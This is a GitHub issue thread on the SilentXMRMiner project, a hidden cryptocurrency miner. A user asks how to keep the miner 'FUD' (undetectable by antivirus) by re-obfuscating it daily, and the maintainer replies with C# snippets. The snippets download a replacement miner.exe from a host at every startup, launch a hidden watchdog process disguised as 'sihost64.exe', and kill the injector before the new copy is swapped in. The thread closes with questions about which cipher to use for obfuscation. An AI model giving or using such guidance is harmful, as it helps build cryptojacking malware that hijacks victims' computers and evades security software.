### ISSUE TITLE
 Solution for detection

### ISSUE THREAD

**Issue by Fleettelematicssystem** [UnamSanctam/SilentXMRMiner#291]
Hi,

I have a solution, I can get methods to make ReFUD daily, but I'll need you to add in the builder the option to download the file generated in "Install" every time it starts, do you think it's possible? to do this update in the builder?

**Comment by UnamSanctam** [comment]
Well, I mean it would technically be possible if it was added into the watchdog https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner/Resources/Watchdog.cs although downloaders do tend to get detected. You could add the downloader yourself by just adding something like 
```
using (var client = new WebClient())
{
    client.DownloadFile("http://example.com/miner.exe", plp);
}
```
right after `plp = PayloadPath;` in that file I linked although you would probably have to kill the miner as well.

**Comment by Fleettelematicssystem** [comment]
I was thinking about changing the host file daily to a FUD file, the watchdog would need every time when starting windows to download the new file from the host to stay on top of the current one, I have a lot of potential for the project, can you help me in this case , who is the only one missing?

**Comment by UnamSanctam** [comment]
If you want it to download the new one when windows starts then you would either have to build a separate loader that downloads the file and starts the miner when windows starts or you would have to restructure the miner so that it starts the watchdog when windows starts and then the watchdog would download and start the miner.

**Comment by Fleettelematicssystem** [comment]
`The Watchdog will run as a separate process called 'sihost64.exe' and will constantly check if the miner is running and correctly placed in the 'Save Path' folder. If the miner is not running and the file is there it will just start it. If the miner is running and the file is not there it will copy the file and start the miner (but won't inject if it's already injected). And finally if both the miner isn't running and the file is gone it will copy the file there and start the miner.`

_as I understand it, the watchdog constantly checks if the miner is being driven, before it does this check, how do I get it to download the file from the host and replace it with the current "services.exe example" it is checking?

Because when this time the old code was injected, but when the computer restarts again, it will already load the new file_

**Comment by UnamSanctam** [comment]
You would probably do it right before `plp = PayloadPath;` in the `Main()` function. You would then change the startup file in Program.cs from the miner to the watchdog. You would also have to make it so that it doesn't restart the watchdog whenever the miner is started by doing something like:
```
if (Process.GetCurrentProcess().MainModule.FileName != plp)
{
    foreach (Process proc in Process.GetProcessesByName("sihost64"))
    {
        proc.Kill();
    }
    Thread.Sleep(3000);
{

if (Process.GetProcessesByName("sihost64").Length < 1)
{
    File.WriteAllBytes(bD + "sihost64.exe", RGetTheResource("#watchdog"));
    Thread.Sleep(1 * 1000);

    Process.Start(new ProcessStartInfo
    {
        FileName = bD + "sihost64.exe",
        WindowStyle = ProcessWindowStyle.Hidden,
        CreateNoWindow = true,
    });
}
```
In the `RBaseFolder()` function inside Program.cs.

**Comment by Fleettelematicssystem** [comment]
> Bem, quero dizer que seria tecnicamente possível se fosse adicionado ao watchdog [https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner/Resources/Watchdog.cs,](https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner/Resources/Watchdog.cs) embora os downloaders tendam a ser detectados. Você mesmo pode adicionar o downloader apenas adicionando algo como
> 
> ```
> using (var client = new WebClient())
> {
>     client.DownloadFile("http://example.com/miner.exe", plp);
> }
> ```
> 
> logo depois `plp = PayloadPath;`naquele arquivo que eu vinculei, embora você provavelmente tenha que matar o mineiro também.


how to kill miner before downloading and copying over?

Can you give me an idea please?

**Comment by UnamSanctam** [comment]
To kill the miner (injector, since that's what you want to kill) you should just able to just do:
foreach (Process proc in Process.GetProcessesByName(Path.GetFileName(plp)))
{
    proc.Kill();
}

**Comment by Fleettelematicssystem** [comment]
I will try to do that then, thank you very much for your help. Do you think this will work? I mean, I believe that you have a lot of experience, the intention would be to make the miner remain FUD indefinitely, always updating the ofuscation.

**Comment by UnamSanctam** [comment]
Well, as long as the watchdog doesn't get detected then it should theoretically work.

**Comment by Fleettelematicssystem** [comment]
can i use any of these 3 cryptographs to obfuscate?

AES
Rijindael
Xor
